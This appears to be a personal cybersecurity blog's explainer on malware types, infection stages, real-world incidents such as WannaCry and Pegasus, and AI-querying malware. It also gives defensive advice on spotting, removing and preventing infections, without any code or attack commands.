What Is Malware? 7 Types, How It Works & How Hackers Use It (2026)

What is Malware? Types, How It Works, Real Examples & How to Remove It (2026 Guide)

In early 2025, a new malware family called PROMPTFLUX was observed actively querying large language models mid-execution — using AI to generate custom evasion code on the fly in response to the specific security software it detected on each infected machine. When PROMPTFLUX encountered Windows Defender, it asked an LLM how to evade Windows Defender specifically, and implemented the response in real time. When it encountered a different endpoint product, it adapted accordingly. Traditional signature-based detection, which works by recognising known malware patterns, was useless against malware that rewrites itself differently for each target.

That is 2026-era malware. But understanding it requires understanding the full spectrum — from the decades-old foundations to the AI-powered variants emerging today. This guide covers every malware type, how each works technically, real attack examples, and exactly what you can do to protect against each one.

The malware landscape in 2026: Over 560,000 new malware samples are detected every day. Malware caused over $6 trillion in global damages in 2025. AI-powered malware families that actively query LLMs for evasion tactics are now confirmed in the wild (PROMPTFLUX, PROMPTSTEAL — Mandiant M-Trends 2026). Fileless malware, which lives entirely in memory and leaves no files on disk, now accounts for more than 50% of advanced attacks.

Quick Navigation:

What malware is — and why "virus" is the wrong word for most of it
How malware infects a system — the full infection chain
Every malware type explained with real examples
Fileless malware — the most dangerous modern variant
AI-powered malware — the 2026 escalation
Signs your device is infected — what to look for
How to remove malware — step-by-step
Prevention — how to avoid infection in the first place

What Malware Is — And Why "Virus" Is the Wrong Word for Most of It

Malware (malicious software) is any software designed to damage, disrupt, gain unauthorised access to, or perform unwanted actions on a computer system, network, or device — without the owner's knowledge or consent.

The word "virus" is colloquially used to mean all malware, but a virus is actually one specific category with specific characteristics (self-replication by attaching to existing files). Modern attacks rarely use traditional viruses. They use trojans, spyware, ransomware, rootkits, and increasingly fileless and AI-powered variants that are far more sophisticated and harder to detect than the viruses of the 1990s and 2000s.

Understanding the specific type of malware matters because each type has different infection methods, different behaviours on the infected system, different goals, and different removal requirements. A rootkit requires a completely different response from a browser hijacker, even though both are "malware."

How Malware Infects a System — The Full Infection Chain

A Typical Modern Malware Infection — Step by Step

Delivery: The malware reaches the target system via a phishing email attachment, a malicious download link, a compromised website (drive-by download), an infected USB drive, a malicious advertisement (malvertising), or a supply chain compromise (malware hidden in a legitimate software update). The delivery method is almost always social engineering — getting a person to take an action that initiates the infection.

Execution: The malicious code runs. This might require the user to open a file (macro-enabled Office document, a fake PDF, an executable disguised as a legitimate file), or it might happen automatically through a browser vulnerability exploited by a malicious webpage (drive-by download).

Establishment: The malware establishes persistence — a mechanism to survive a reboot. Methods include: adding registry entries, creating scheduled tasks, modifying startup folders, or installing a service. At this stage, the malware will reload automatically every time the system restarts.

Command and Control (C2): The malware contacts a remote server controlled by the attacker — called a C2 or C&C server. This connection allows the attacker to send commands, receive stolen data, and update the malware. C2 communication is often disguised as normal HTTPS traffic to avoid detection.

Payload execution: The malware performs its primary function — stealing credentials, encrypting files, logging keystrokes, mining cryptocurrency, providing remote access, exfiltrating data, or spreading to other systems on the same network. This is the phase that produces visible damage or enables further attacks.

Every Malware Type Explained — With Real Examples

Classic Type

Virus

A virus attaches itself to a legitimate file and replicates when that file is executed or shared — like a biological virus that needs a host cell. When an infected file runs, the virus code runs too, infecting additional files on the same system. Viruses spread to other computers when infected files are shared (email attachments, USB drives, file sharing). Traditional viruses are less common in modern attacks because they require a host file to execute and are reliably detected by signature-based antivirus software.

How it infects: Attaches to executable files (.exe, .com), macro-enabled documents, or boot sectors. Activates when the infected file is opened or the infected drive is booted from.

Historic example: The ILOVEYOU virus (2000) spread via email as a "love letter" attachment. It overwrote files, spread through Outlook address books, and infected 10% of internet-connected computers worldwide within days — causing approximately $10 billion in damage. Simple by modern standards but devastating at a time before widespread antivirus adoption.

Most Common Attack Tool

Trojan (Trojan Horse)

A trojan disguises itself as legitimate, useful software to trick users into installing it. Unlike a virus, it does not self-replicate — it relies on social engineering to spread. Once installed, it performs malicious actions hidden from the user: opening backdoors for remote access, downloading additional malware, stealing credentials, or providing a foothold for further attacks. Trojans are the most common malware type used in targeted attacks because they can be customised to specific objectives and disguised as any type of software.

How it infects: User downloads and runs what appears to be a legitimate application — a cracked game, a free utility, a fake browser update, or a document with an embedded trojan. The legitimate-looking front-end may actually work while the malicious payload operates silently in the background.

Real example: Emotet began as a banking trojan in 2014, evolved into a modular malware distribution platform, and became the world's most dangerous malware by 2021. It spread via phishing emails containing malicious Word documents with macros. Once installed, Emotet downloaded additional payloads — often TrickBot (credential stealer) followed by Ryuk ransomware — turning a single email click into a full ransomware incident. Europol called its takedown in 2021 "the world's most dangerous malware operation."

Spy on You

Spyware

Spyware secretly monitors user activity and sends collected data to the attacker. It operates without the user's knowledge or consent, harvesting information over time rather than causing immediate visible damage. Types range from commercial-grade spyware marketed as "parental monitoring" software to sophisticated nation-state tools that intercept encrypted communications. The defining characteristic is covert observation and data exfiltration without the user's awareness.

How it infects: Often bundled with free software (adware bundles), installed through browser exploits, delivered via phishing, or in some high-value cases, installed through zero-click exploits that require no user interaction at all (as with Pegasus).

Real example: NSO Group's Pegasus spyware — used by governments against journalists, activists, and executives — was installed on targets' phones through zero-click iMessage vulnerabilities (requiring no user action). Once installed, it exfiltrated all messages, calls, emails, photos, and location data. An investigation by Amnesty International and Forbidden Stories found Pegasus was used to target at least 1,400 journalists and activists globally, including the associates of murdered journalist Jamal Khashoggi.

Every Keystroke

Keylogger

Records every keystroke the user types and sends the log to the attacker. This captures usernames, passwords, credit card numbers, personal messages, and anything else typed on the keyboard. Keyloggers may be software-based (installed on the operating system) or hardware-based (physical devices attached between the keyboard and computer, often used in corporate espionage or targeted attacks on specific workstations).

How it infects: Software keyloggers are installed via trojans, phishing attachments, or drive-by downloads. They typically hook into the Windows API to intercept keystrokes at the OS level before encryption is applied — meaning even HTTPS-encrypted communications are vulnerable because the keylogger captures text before it is encrypted.

Real example: Agent Tesla is a widely-used commercial keylogger and remote access trojan (RAT) that first appeared in 2014 and remains one of the most prevalent credential-stealing malware families in 2026. It is sold as Malware-as-a-Service, deployed primarily through phishing emails with malicious Office attachments, and is particularly common in attacks against small businesses and supply chain partners. It captures keystrokes, screenshots, clipboard data, and stored browser credentials.

Hardest to Remove

Rootkit

A rootkit conceals itself and other malicious software from the operating system and security tools by modifying the OS itself at a fundamental level. Once installed, a rootkit can hide processes, files, registry entries, and network connections — making other malware running on the system effectively invisible. The name comes from "root" (administrator) access on Unix systems. Rootkits are the most technically sophisticated malware and the hardest to remove — because the tools you would use to detect them are themselves running on an OS that the rootkit controls.

How it infects: Requires administrator-level access to install — typically achieved through an exploit or after a trojan establishes initial access and escalates privileges. Kernel-level rootkits modify the operating system kernel directly. Bootkit variants infect the master boot record, loading before the OS itself.

Real example: The Sony BMG rootkit scandal (2005) — Sony embedded rootkit technology in 22 million music CDs to prevent copying. The rootkit hid itself from Windows, ran constantly in the background, and — critically — could be exploited by third-party malware authors to hide their own malware under Sony's hidden directory. Security researcher Mark Russinovich discovered it; Sony faced massive backlash and class-action lawsuits. It demonstrated that rootkit techniques are not purely criminal — they are also used by corporations for DRM purposes, raising significant ethical concerns.

Self-Spreading

Worm

Unlike a virus, a worm does not need a host file — it is a self-contained, self-replicating program that spreads across networks without user interaction. Worms exploit vulnerabilities in network services, operating systems, or applications to propagate automatically from machine to machine. A single infected system on a corporate network can infect thousands of other systems within hours through automated scanning and exploitation. Worms often carry a secondary payload — they may spread ransomware, install backdoors, or form botnets.

How it infects: Exploits network-accessible vulnerabilities. Scans for other vulnerable systems and replicates itself automatically. The WannaCry worm spread through the EternalBlue exploit (SMB vulnerability) — a single unpatched internet-facing machine could infect every unpatched machine on the same network in minutes.

Real example: WannaCry (2017) infected 230,000 computers in 150 countries in a single day, including 80 NHS hospital trusts in the UK (forcing cancellation of 19,000 appointments). It used the NSA-developed EternalBlue exploit, leaked by the Shadow Brokers group. Damage exceeded $4 billion globally. The patch for the exploited vulnerability had been available for two months — every WannaCry infection was a preventable failure to patch.

Modern & Dangerous

Fileless Malware

Fileless malware operates entirely in system memory (RAM) and uses legitimate operating system tools to carry out malicious actions — never writing a file to disk. Because traditional antivirus software detects malware by scanning files, fileless malware is invisible to most signature-based security tools. It loads into memory through an existing process (typically a browser, document viewer, or system utility), executes its payload, and may disappear entirely when the system is rebooted — leaving minimal forensic evidence.

How it infects: Exploits vulnerabilities in browsers or document viewers to execute shellcode in memory, or uses PowerShell, WMI, or the Windows Registry to execute commands without dropping files. Often delivered through malicious macros or browser exploits that execute code directly in memory.

Real example: The Lazarus Group (North Korean state-sponsored) used fileless malware techniques throughout their financial system attacks in 2025-2026, including in the preparation stages of the $1.5 billion Bybit theft. Their tools used legitimate Windows processes to execute malicious code, making detection extremely difficult. Mandiant's M-Trends 2026 report notes fileless techniques are now present in more than 50% of advanced persistent threat (APT) intrusions.

2026 Frontier

AI-Powered Malware

The newest and most concerning category. AI-powered malware uses large language models (LLMs) to dynamically adapt its behaviour, evade detection, and improve its own effectiveness during execution. Mandiant confirmed the existence of two AI-querying malware families in M-Trends 2026: PROMPTFLUX (queries LLMs mid-execution to generate evasion code specific to the detected security software) and PROMPTSTEAL (uses LLMs to identify and extract credentials and configuration files based on the specific environment it finds itself in). The QUIETVAULT credential stealer was observed executing predefined prompts against local AI command-line tools on infected machines to locate configuration files.

How it infects: Initial infection via standard vectors (phishing, exploits). The AI component activates post-infection, using the infected machine's internet connection or local AI tools to query LLMs for targeted assistance. This represents a fundamental shift — malware that improves itself in response to the specific defences it encounters, rather than following a predetermined script.

Implications: Traditional signature-based and behaviour-based detection both struggle against AI-powered malware because it behaves differently on every machine. This is why Mandiant's 2026 report emphasises moving from pattern-based detection to anomaly detection — identifying that something unusual is happening, rather than recognising a specific known-bad pattern.

Signs Your Device May Be Infected With Malware

Unexplained slowness or high CPU/memory usage — especially if a specific process you don't recognise is consuming resources (cryptomining malware, spyware)
Browser behaviour changes — new homepage or search engine you didn't set, new toolbars or extensions, redirects to unexpected websites (browser hijacker, adware)
Security software disabled or won't start — many malware types disable antivirus as a first step after infection (rootkits, advanced trojans)
Unusual network activity — high outbound traffic when you're not using the internet, connections to unknown IP addresses (C2 communication, data exfiltration)
Files encrypted or inaccessible — the most visible sign of ransomware (covered in the ransomware guide)
Accounts logged into from unexpected locations — indicates credential theft by a keylogger or spyware
Unexpected pop-ups or advertisements — even outside the browser (adware)
Your contacts receive strange messages from you — indicates your email or social media accounts have been compromised, possibly by a worm spreading itself

Important: The absence of these signs does not mean a device is clean. Sophisticated malware is specifically designed to be invisible — rootkits, fileless malware, and advanced spyware can operate for months without any visible symptom. If you have reason to believe a device is compromised (you clicked a suspicious link, opened an unexpected attachment, or your credentials appeared in a breach), investigate proactively rather than waiting for symptoms.

How to Remove Malware — Step by Step

Disconnect From the Network

Immediately disconnect the infected device from the internet and from any internal network. Disable WiFi, unplug ethernet. This stops data exfiltration, cuts C2 communication, and prevents network-spreading worms from infecting other devices. Do not reconnect until the device is confirmed clean.

Boot Into Safe Mode

Safe Mode loads Windows with only essential drivers and processes — most malware does not load in Safe Mode because it runs as an optional service or startup program. Performing the scan in Safe Mode prevents the malware from actively interfering with detection and removal. On Windows: restart, hold Shift while clicking Restart, then Troubleshoot > Advanced Options > Startup Settings > Restart > Safe Mode with Networking.

Run a Dedicated Malware Scanner

Your regular antivirus may have been compromised or may not detect the specific malware. Use a second-opinion scanner: Malwarebytes Free, HitmanPro, or Microsoft's standalone Malicious Software Removal Tool (MSRT). These tools use different detection engines and may catch what your primary tool missed. Run a full system scan, not a quick scan.

Check Startup Programs and Scheduled Tasks

Open Task Manager > Startup tab and Process Monitor (Sysinternals) to identify any suspicious processes or startup entries. Review scheduled tasks (Task Scheduler) for any unknown entries. Many malware families achieve persistence through these mechanisms. Research any unfamiliar entry names before disabling them.

Change All Passwords From a Clean Device

Assume any password typed on the infected device has been captured by a keylogger. Change all passwords — especially email, banking, social media, and work accounts — from a different, uninfected device. Do this after the infected device has been cleaned, not before, otherwise you may be keyllogging your new passwords too. Enable MFA on all accounts if not already active.

For Severe Infections: Wipe and Reinstall

For rootkits, bootkits, fileless malware, or any infection where you cannot be certain of complete removal: the safest approach is a full wipe and OS reinstallation from a known-clean source. Backup data to an external drive (scan the backup), format the drive, reinstall the OS, restore data, and reinstall applications. Time-consuming but the only guarantee of a clean system for severe infections.

Prevention — How to Avoid Malware Infection

Malware Prevention Checklist

Keep everything updated. The OS, browsers, browser plugins, and all installed software. The majority of drive-by downloads and worm propagations exploit known, patched vulnerabilities. Unpatched systems are the primary attack surface for automated malware campaigns.
Never open email attachments or links without verifying the sender. Malware delivery is dominated by phishing emails. No legitimate service will send you an attachment you didn't request. Apply the SLAM method from the phishing guide to every unexpected email.
Only download software from official sources. Pirated software, cracked applications, and unofficial download sites are the primary distribution vector for trojans. The risk of malware in pirated software is not theoretical — it is near-certain for popular titles.
Use a reputable endpoint security product and keep it updated. No tool provides complete protection, but modern EDR (Endpoint Detection and Response) products detect behavioural anomalies that signature-based tools miss. Free options (Windows Defender, Malwarebytes Free) provide meaningful protection. Paid EDR solutions add behavioural analysis, memory scanning, and threat hunting capabilities.
Enable a firewall and review outbound traffic rules. A host-based firewall that blocks unexpected outbound connections can detect C2 communication — a malware-infected machine suddenly attempting to connect to unusual IP addresses on unusual ports is a detectable signal.
Disable macros in Office documents by default. Macro-enabled Office documents remain one of the most common malware delivery mechanisms. Default macro settings in Office should block macros from running in documents received from email or the internet. Enable macros only for documents from trusted sources where you can verify the need.
Back up data regularly to an offline location. Backups do not prevent malware infection, but they remove the leverage ransomware has over you and allow recovery from destructive malware. Follow the 3-2-1 backup rule as described in the ransomware protection guide.
Be suspicious of any USB drive you didn't personally purchase and insert. Never plug in a USB drive you found, received unexpectedly, or cannot trace to a verified source. The baiting technique in social engineering exploits exactly this scenario.

About the Author

Amardeep Maroli

MCA student and cybersecurity enthusiast from Kerala, India. I focus on API security, ethical hacking, and secure application development. I build practical guides from hands-on experience — not just textbook definitions.

Malware FAQs

What is the difference between a virus and malware?

Malware is the umbrella term for all malicious software — it includes viruses, trojans, ransomware, spyware, worms, rootkits, and every other malicious software category. A virus is one specific type of malware with a specific characteristic: it self-replicates by attaching to and infecting other files, spreading when infected files are executed or shared. Saying "my computer has a virus" when it actually has a trojan or ransomware is like saying "I have a cold" when you actually have the flu — both are illnesses, but they're different and require different treatments. The distinction matters practically because different malware types require different detection methods and removal procedures.

Can malware infect a phone or tablet?

Yes — mobile malware is a significant and growing threat on both Android and iOS. Android is more vulnerable because it allows sideloading (installing apps from outside the official Play Store) and has a more fragmented update ecosystem. Common mobile malware types include banking trojans that overlay fake screens over real banking apps to steal credentials, spyware that accesses the microphone and camera, SMS interceptors that steal two-factor authentication codes, and ransomware. iOS is less vulnerable due to its closed ecosystem and strict App Store review, but zero-click spyware like Pegasus has demonstrated that even fully-patched iOS devices can be compromised. Keep your phone's OS and apps updated, only install apps from official stores, and be cautious of any app requesting permissions it doesn't need.

Does antivirus software protect against all malware?

No — antivirus software significantly reduces risk but cannot provide complete protection. Traditional signature-based antivirus recognises known malware by matching against a database of known-bad patterns. It is blind to: zero-day malware (never-before-seen variants), fileless malware (nothing written to disk to scan), heavily obfuscated or packed malware, and AI-powered malware that modifies itself to evade known signatures. Modern endpoint detection and response (EDR) tools add behavioural analysis — detecting suspicious activity patterns regardless of whether the specific malware is known — which is more effective against advanced threats. But no tool replaces good security hygiene: keeping software patched, being suspicious of unsolicited attachments, and using unique strong passwords with MFA.

What is Malware-as-a-Service and why does it matter?

Malware-as-a-Service (MaaS) operates on the same model as legitimate software-as-a-service — malware developers build the malware, maintain it, and provide it to customers (other criminals) for a subscription fee or revenue share, rather than using it themselves. Examples include keyloggers like Agent Tesla, ransomware platforms like LockBit and Qilin, and stealers like RedLine and Raccoon. MaaS dramatically lowers the technical barrier to conducting malware attacks — someone with no programming ability can deploy sophisticated, enterprise-grade malware by paying a subscription and following instructions. This is a major reason why attack volumes have increased so dramatically: the supply of capable malware is no longer limited by the number of skilled malware developers.

How do I know if a website is infected with malware (a watering hole)?

This is genuinely difficult because a watering hole attack compromises a legitimate, trusted website — it looks exactly as it normally does. Technical indicators that something may be wrong: your browser flags an unexpected security certificate change, browser security tools like Google Safe Browsing display a warning, the site's load time is noticeably different, or your security software flags an outbound connection attempt immediately after visiting. The most reliable defence is not detection but prevention: keep your browser fully updated (patches close the vulnerabilities that drive-by downloads exploit), use browser isolation for high-risk browsing, and have endpoint security that monitors for unusual process behaviour after a web visit. For very high-security environments, consider using a sandboxed browser that runs in an isolated environment and cannot affect the main OS.

Search This Blog

TechWithAmardeep